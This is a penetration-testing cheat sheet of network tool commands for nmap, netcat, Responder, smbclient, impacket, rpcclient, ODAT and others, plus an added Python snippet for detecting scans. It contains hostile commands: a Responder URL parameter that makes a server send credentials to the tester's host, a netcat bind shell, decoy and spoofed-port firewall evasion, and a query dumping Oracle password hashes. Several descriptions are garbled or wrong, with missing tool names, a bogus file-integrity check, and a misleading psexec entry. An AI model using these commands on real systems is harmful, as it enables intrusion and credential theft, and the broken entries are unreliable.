Here are some tools and utilities commonly used for practices related to networks:
OpenVPN
VPN system which implements both client and server applications, including a command-line utility
Commands
Installation
sudo apt install openvpn
Connect to a VPN
sudo openvpn $ovpnfile
SmbClient
Tool for accessing a server using the SMB protocol
Commands
Installation
sudo apt install smbclient
Connect and interact with an SMB server
smbclient -I $IP #Connect to the server
smbclient -L $IP -N #List shares on the server without providing a password
smbclient //$IP/$ShareName #Access a share
smbclient \\\\$IP\\$ShareName #Alternative syntax
smbclient //$IP/$ShareName -U $username #Connect specifying a username
smbclient //$IP/$ShareName -c "$command" #Execute a command and exit
smb: \> #Text based interface
smb: \> get $filename #Download a file
smb: \> put $filename #Upload a file
smb: \> exit #Close connection
Responder
Commands
Install
sudo apt install responder
Change configuration file
sudo nano /usr/share/responder/Responder.conf #Installed here by default
Initialize tool
sudo responder -I $networkinterface
If we get an error on any port, edit Responder.conf and set the service bound to that port to Off
http://$url/$query?$value=//$myip/somefile
If the process works, we will see the server catch the credentials
Tcpdump
Commands
Install
sudo apt install tcpdump
Set up listener
sudo tcpdump -i $networkInterface port $port
Netcat
Unix utility which reads and writes data across network connections
Can act as a client or as a listener (server)
Uses TCP by default but also supports UDP
Commands
Install
sudo apt install netcat-traditional
Start netcat
nc $hostname $port
nc -n $IP $port #Use only numeric IP no DNS
nc -v $hostname $port #Verbose Output
Start in listen mode
nc -l -p $port
nc -nvlp $port #Preferred form: no DNS, verbose, listen on the given port
Make a file transmission
nc -nvlp $port > $incomingfile #From the listening side
nc -nv $IP $port < $file #From the sender side (target IP and port are required)
#From the listening side
$incomingfile -h #Check that the transmission was correct
Execute a program over the server
nc -l -p $port -e $program
Interact with network protocols
#Example
sudo nc $ip 80 #We connect to HTTP service
#We send a request
GET / HTTP/1.1
host: netcat #After finishing hit enter to send
To insert a line break, press Shift+Enter
Nmap
Open source tool for network exploration and security auditing which works as a network mapper
Scan types
SYN scans are also known as Half-open or Stealth. They are stealthier than Connect scans
The difference between Connect and SYN scans is that Connect performs a full three-way handshake with the target, whereas SYN scans send back an RST packet after receiving a SYN/ACK
The UDP scans are slower than TCP scans
In UDP scans, an open port sends no response and is marked open|filtered. If there is a response, the port is marked open. If it's closed, the target responds with an ICMP packet stating that the port is unreachable
NULL, FIN, Xmas, and ACK scans are stealthier than SYN or UDP scans, usually used for firewall evasion
NULL scans send a TCP request with no flags, the target host responds with RST if the port is closed
FIN scans send a TCP request with the FIN flag, used to gracefully close an active connection, the target host responds with RST if the port is closed
Xmas scans send a malformed TCP packet, and the target host responds with RST if the port is closed
Microsoft Windows may respond to a NULL, FIN or Xmas scan with a RST for every port
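The flag combinations described above are also what a defender sees on the wire. As an added example (not part of the original notes), the following Python parses constructed tcpdump-style summary lines and groups probes per source address by the scan type their flags match (SYN, NULL, FIN, Xmas, ACK); the sample lines, the threshold and the helper names are assumptions made for the example.

```python
import re
from collections import defaultdict

# tcpdump prints TCP flags in brackets: S=SYN, .=ACK, F=FIN, P=PSH, U=URG, R=RST
# Each flag set is mapped to the nmap scan type that sends exactly those flags.
SCAN_BY_FLAGS = {
    frozenset("S"): "SYN",      # -sS probe
    frozenset(): "NULL",        # -sN probe: no flags at all
    frozenset("F"): "FIN",      # -sF probe
    frozenset("FPU"): "Xmas",   # -sX probe: FIN+PSH+URG
    frozenset("."): "ACK",      # -sA probe: ACK only
}

# Matches the "IP src.sport > dst.dport: Flags [..]" part of a tcpdump line
LINE_RE = re.compile(
    r"IP (?P<src>[\d.]+)\.(?P<sport>\d+) > (?P<dst>[\d.]+)\.(?P<dport>\d+): "
    r"Flags \[(?P<flags>[SFPUR.]*)\]"
)

# Constructed sample capture (not real traffic): a NULL scan from 10.0.0.5,
# an Xmas scan from 10.0.0.7, and a normal handshake from 10.0.0.8.
SAMPLE = """\
12:00:01.000 IP 10.0.0.5.40001 > 10.0.0.9.22: Flags [], seq 0, win 1024
12:00:01.001 IP 10.0.0.5.40001 > 10.0.0.9.80: Flags [], seq 0, win 1024
12:00:01.002 IP 10.0.0.5.40001 > 10.0.0.9.443: Flags [], seq 0, win 1024
12:00:01.003 IP 10.0.0.9.22 > 10.0.0.5.40001: Flags [R.], seq 0, ack 1, win 0
12:00:02.000 IP 10.0.0.7.51000 > 10.0.0.9.25: Flags [FPU], seq 0, win 1024
12:00:02.001 IP 10.0.0.7.51000 > 10.0.0.9.110: Flags [FPU], seq 0, win 1024
12:00:02.002 IP 10.0.0.7.51000 > 10.0.0.9.143: Flags [FPU], seq 0, win 1024
12:00:03.000 IP 10.0.0.8.50123 > 10.0.0.9.443: Flags [S], seq 100, win 64240
12:00:03.001 IP 10.0.0.9.443 > 10.0.0.8.50123: Flags [S.], seq 1, ack 101, win 65160
12:00:03.002 IP 10.0.0.8.50123 > 10.0.0.9.443: Flags [.], ack 1, win 502
""".splitlines()


def classify_probe(flags: str) -> str:
    """Map a tcpdump flag string to the scan type it matches, or 'other'."""
    return SCAN_BY_FLAGS.get(frozenset(flags), "other")


def detect_scans(lines, threshold=3):
    """Return {(src, scan_type): sorted distinct dst ports} for every source that
    sent one probe type to at least `threshold` distinct ports."""
    probes = defaultdict(set)
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue  # not a TCP summary line in the expected shape
        kind = classify_probe(m["flags"])
        if kind != "other":  # replies such as [S.] and [R.] are ignored
            probes[(m["src"], kind)].add(int(m["dport"]))
    return {k: sorted(v) for k, v in probes.items() if len(v) >= threshold}
```

The single SYN from 10.0.0.8 stays below the threshold, so only the NULL and Xmas sweeps are reported; a Windows host answering RST on every port (as noted above) would show up as the `[R.]` replies the parser skips.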
NSE
Every script has a category related to its use scenario
By default nmap stores scripts in /usr/share/nmap/scripts/script.db
Port State
Open: This indicates that the connection to the scanned port has been established
Closed: TCP protocol indicates that the packet we received back contains an RST flag. Can be used to determine if a target is alive or not
Filtered: Cannot correctly identify whether the scanned port is open or closed because it got no response or an error code from the target
Unfiltered: Only occurs during the TCP-ACK scan and means that the port is accessible, but it cannot be determined if it's open or closed
Open|filtered: Didn't get a response, so a firewall or packet filter could be protecting the port
Closed|filtered: Only occurs in the IP ID idle scans, indicating it was impossible to determine if a port is closed or filtered by a firewall
Commands
Install
sudo apt install nmap
Basic scans
nmap $scantype $options $target #General syntax
nmap $ip #Scan an IP
nmap $domain #Scan a host by domain name
nmap $ip1 $ip2 # Scan some IPs
nmap x.x.x.$range1-$range2 #Scan a range of IPs
nmap x.x.x.x/$mask #Scan using CIDR notation
nmap -iL $inputfile #Scan using the IPs from a list
nmap -iR $number #Scan random hosts
nmap --exclude $ip #Scan excluding a specific IP
nmap --excludefile $file #Scan excluding the IPs from a list
TCP scan
nmap -sT $target #TCP Connect scan, default if run without sudo
nmap -sS $target #TCP SYN scan, default if run with sudo
nmap -sN $target #TCP Null scan, good for firewall evasion
nmap -sF $target #TCP FIN scan, good for firewall evasion
nmap -sX $target #TCP Xmas scan, good for firewall evasion
nmap -sA $target #TCP ACK scan, good for firewall evasion
UDP scan
nmap -sU $target
Select which port scan
nmap -p $port $target
nmap -p $port1-$port2 $target #Select a range of ports
nmap -p- $target #Scan all ports
nmap --top-ports $numberofports $target #Scan the given number of most common ports
nmap -F $target #Scan the 100 most common ports
Scan without checking if target is alive
nmap -Pn $target #Skip host discovery; treat the target as alive
nmap --disable-arp-ping $target #Don't use ARP ping for host discovery
Append an arbitrary length of random data to the end of packets
nmap $target --data-length $number
Specify the number of retries if a packet gets dropped or blocked
nmap $target --max-retries $number
For firewall evasion
nmap $target -Pn -n -S $myIP -e $interface #Use different Source IP
nmap $target -Pn -n --disable-arp-ping -D RND:$number #Use decoys so the probes appear to come from random IPs
nmap $target -Pn -n --disable-arp-ping --source-port 53 #Send probes from source port 53 so they look like DNS traffic
ARP-Scan
Only devices in the same subnet can be discovered
Commands
Install
sudo apt install arp-scan
Scan options
arp-scan $targetRange
arp-scan -l #Scan the local network
arp-scan $targetRange -I $netInterface #Specify which network interface to use
Masscan
Tool for making port scanning, which is optimized for speed, making it particularly useful for large-scale scans
Commands
Install
sudo apt install masscan
Scan options
masscan $targetRange -p $ports
masscan $targetRange --top-ports $number #Specify the number of most used ports
Docker
An open-source platform that allows you to build, package, and run applications in isolated environments called containers
sudo docker rm $containerID #Delete a container
sudo docker build . #Build an image from the Dockerfile in the current folder
sudo docker image ls #List all installed images
sudo docker image rm $imageID #Delete an installed image
sudo docker container ls #List all running containers
sudo docker run $imageID #Run a container from an image ID
sudo docker run $imageName #Run a container from an image name
sudo docker run --rm $imageName #Run a container and delete it when done (options go before the image name)
sudo docker run -p $hostPort:$containerPort $imageName #Publish a container port on the host
sudo docker container stop $containerID #Stop a running container
sudo docker compose up -d #Use a compose .yml file to run several containers in the background
onesixtyone
SNMP scanner used to brute-force community string names
Commands
Install
sudo apt install onesixtyone
Usage
onesixtyone -c $dictionary $IP
xfreerdp
Commands
Install
sudo apt install freerdp2-x11
Usage
xfreerdp /v:$host #Connect to a remote machine
xfreerdp /v:$host /u:$username #Connect as a user without providing a password
xfreerdp /v:$host /u:$username /p:$password #Connect as a user providing password
Rsync
Command-line tool for fast, flexible, and efficient file and directory synchronization and transfer between two locations
Commands
Install
sudo apt install rsync
Usage
rsync $IP #Connect to the remote service
rsync --list-only $IP #Just list the contents
rsync 10.129.197.128:: #When the target is using a daemon instead of SSH
rsync --list-only $IP::$foldername #List the contents of a folder
rsync $IP::$foldername/$filename $localpath #Transfer a shared file
Impacket
Collection of Python classes for working with network protocols
Commands
Installation
sudo apt install python3-impacket
Use of scripts
sudo impacket-$scriptname $options
#Common scripts
sudo impacket-mssqlclient $hostname/$user@$ip #Connect to MS SQL server
sudo impacket-mssqlclient $hostname/$user@$ip -windows-auth #Use Windows authentication to connect to MS SQL server
sudo impacket-psexec $username@$IP #Connect to the network service of a host
sudo impacket-samrdump $IP #Enumerate users and their RIDs over SAMR
sudo impacket-wmiexec $username:"$password"@$IP "$command" #Run a command (e.g. hostname) over WMI to check access
Scapy
Powerful interactive packet manipulation library written in Python, used to forge or decode packets of a wide number of protocols, send, capture them, match requests and replies, and much more
Commands
Install
pip install scapy
Usage
sudo scapy #Enter interactive mode
>>> send(IP(dst="$IP")/ICMP()/"$Payload") #Send an ICMP packet
>>> ls() #List all available formats and protocols
>>> ls($Protocol) #List all options and fields of a protocol or packet format
>>> explore() #Navigate Scapy layers and protocols
>>> explore($Protocol) #Navigate a specific protocol or packet format
Tshark
Command-line packet capture tool, used here to capture ICMP packets. Comes by default with the Wireshark package
Commands
Install
sudo apt install wireshark
Usage
sudo tshark host $IP
Aircrack-ng
Wireless security toolset used for monitoring, attacking, testing, and cracking Wi-Fi networks
Rpcclient
Tool for interacting with MS-RPC, which underpins operational and work-sharing structures in networks and client-server architectures; useful for enumeration of the SMB protocol
Commands
Install
sudo apt install rpcclient
Usage
rpcclient -U "$username" $IP # Connect to a host
rpcclient -U "" $IP # Connect anonymously
rpcclient $> srvinfo # Get server information.
rpcclient $> enumdomains # Enumerate all deployed domains
rpcclient $> querydominfo # Get domain, server, and user information
rpcclient $> netshareenumall # Enumerate all available shares
rpcclient $> netsharegetinfo $share #Provide information about a share
rpcclient $> enumdomusers # Enumerate all domain users
rpcclient $> queryuser $userID # Provide information about a user
rpcclient $> querygroup $groupID # Provide information about a group
smbmap
Security tool used for enumerating and interacting with SMB shares on a network
Commands
Install
sudo apt install smbmap
Usage
smbmap -H $IP
CrackMapExec
Powerful post-exploitation tool used for network reconnaissance, credential validation, and lateral movement in Windows Active Directory (AD) environments
ODAT
The first time odat runs it prints some errors; this is normal and they do not appear on later runs
Usage
./odat.py -h #Show the help; use it to confirm the installation was successful
./odat.py all -s $IP #Scan target using all modules
./sqlplus $User/$Password@$IP/$SIDfound #Log in as a user
./sqlplus $User/$Password@$IP/$SIDfound as sysdba #Log in as System Database Admin
#Once inside the database
SQL> select table_name from all_tables; #Get table names
SQL> select * from user_role_privs; #Check the privileges of the user
SQL> select name, password from sys.user$; #Get password hashes of users
Tool descriptions
Responder: Helps in the passive collection of credentials by setting up a server on the network that intercepts internal communication from the protocol
Responder: Abuse an on a web page to intercept SMB credentials (the URL form shown in the Responder section)
Tcpdump: Command-line packet analyzer used to capture and inspect network traffic sent via the protocol in real time
NSE: The NSE is a library of scripts written in Lua that can be used for scanning for vulnerabilities and automating exploits for them
ARP-Scan: Tool for host discovery via the ARP protocol
xfreerdp: An open-source implementation of the RDP protocol
Tool for user enumeration for the protocol
ODAT: Oracle Database Attacking Tool, an open-source penetration testing tool that tests the security of databases remotely